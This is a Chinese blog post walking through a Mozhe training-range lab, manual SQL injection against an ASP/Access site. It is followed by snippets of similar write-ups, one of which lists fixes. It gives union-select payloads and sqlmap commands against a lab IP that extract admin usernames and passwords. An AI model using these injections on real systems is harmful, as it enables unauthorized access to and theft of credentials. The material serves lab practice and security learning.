SQL手工注入漏洞测试(Access数据库)

最新推荐文章于 2023-08-26 07:59:42 发布
最新推荐文章于 2023-08-26 07:59:42 发布
阅读量175 收藏
点赞数
分类专栏: 渗透测试 文章标签: 数据库 sql oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45445398/article/details/129338665
版权

打开题目熟悉的界面
在这里插入图片描述
用order by 测试后有四列。
这里要说一下Access数据库的结构

Access数据库

              表名

                     列名

                            数据

注意:Access数据库只有一个数据库。

手工猜数据库名为admin

 id=1 and 1=2 union select 1,2,3,4 from admin

在这里插入图片描述
发现对了当然可以用sqlmap爆破

 sqlmap -u "http://219.153.49.228:44727/new_list.asp?id=1" --tables

列名同样可以猜和用sqlmap爆破

sqlmap -u "http://219.153.49.228:44727/new_list.asp?id=1" --column -T admin

在这里插入图片描述

得到后就在回显的2,3查找username和passwd
下面展示一些 内联代码片

 id=1 and 1=2 union select 1,username,passwd,4 from admin

得到账号密码登录获得key

weixin_45445398
关注
专栏目录
墨者学院 - SQL手工注入漏洞测试(Access数据库)
多崎巡礼的博客
07-26 965
进入公告找到注入点 地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。 3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。 4.猜测这个表里面有哪些字段:order ...
墨者靶场 SQL手工注入漏洞测试(Access数据库)
曹振国的博客
06-20 659
Access 注入关于Access:进入环境:1.寻找注入点2.查询字段数3.猜测它有admin表4.猜字段5.寻找输出点6.查询username,passwd字段md5解密,进入后台拿到key值 关于AccessAccess 是表的集合 Access 数据库的结构 => 表、字段 select xxx from 表 => 正常查询 想知道access的表名你只能去猜 常见的表: admin news job work admin_user user 进入环境: 1.寻找注入点 ?id=
墨者 - SQL手工注入漏洞测试(Access数据库)
吃肉唐僧的博客
07-05 715
order by 1 ,有回显,存在注入点 new_list.asp?id=1 and exists(select * from admin)测试是否存在admin,纯靠猜...... 存在admin表,接下来测回显位置 /new_list.asp?id=1 union select 1,2,3,4 from admin 接下来猜字段值,and exists ...
墨者学院-SQL手工注入漏洞测试(Access数据库)
JohnReese01的博客
01-26 285
1.判断是否存在注入点 在?id=1的结尾添加and 1=1和 and 1=2检测是否存在注入,结果为正常和错误,经验证存在注入点; 2.猜解表名 (因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。) 在?id=1结尾添加语句:and exists(select * from admin)  若存在表名为admin的表,则页面正常显示。 3.猜解列名 ...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
墨者靶场 入门:SQL手工注入漏洞测试Access数据库
qq_43233085的博客
01-10 1257
入门:SQL手工注入漏洞测试Access数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5...
SQL手工注入漏洞测试Access数据库(墨者学院靶场)
ISNS的博客
07-09 1491
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
墨者靶场-SQL手工注入漏洞测试(Access数据库)
最新发布
Sa1nZen的博客
08-26 266
墨者靶场-SQL手工注入漏洞测试(Access数据库)
墨者学院 SQL手工注入漏洞测试(Access数据库)
痴人说梦梦中人
11-13 341
1、 判断注入点,求主查询列数,order by 4不报错,by3报错。 2、 猜解数据库,登陆获取key 3、 修复建议 对sql语句进行以下处理: ①、 sql语句预编译 ②、 检查变量数据类型和格式 ③、 过滤特殊字符 ④、 转译特殊符号 ...
墨者学院02 SQL手工注入漏洞测试(Access数据库)
weixin_42789937的博客
01-24 320
墨者学院02 SQL手工注入漏洞测试(Access数据库),是一个较为详细的WP~
SQL注入攻击:Access数据库防御策略
Access数据库中,攻击者利用恶意文本命令插入到预定义的查询语句中,以此获取未经授权的敏感数据,如用户密码、信用卡信息等。这种攻击手段包括手工注入、工具注入以及特定的注入技术,如AhD注入、HDSI和NBSI等。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值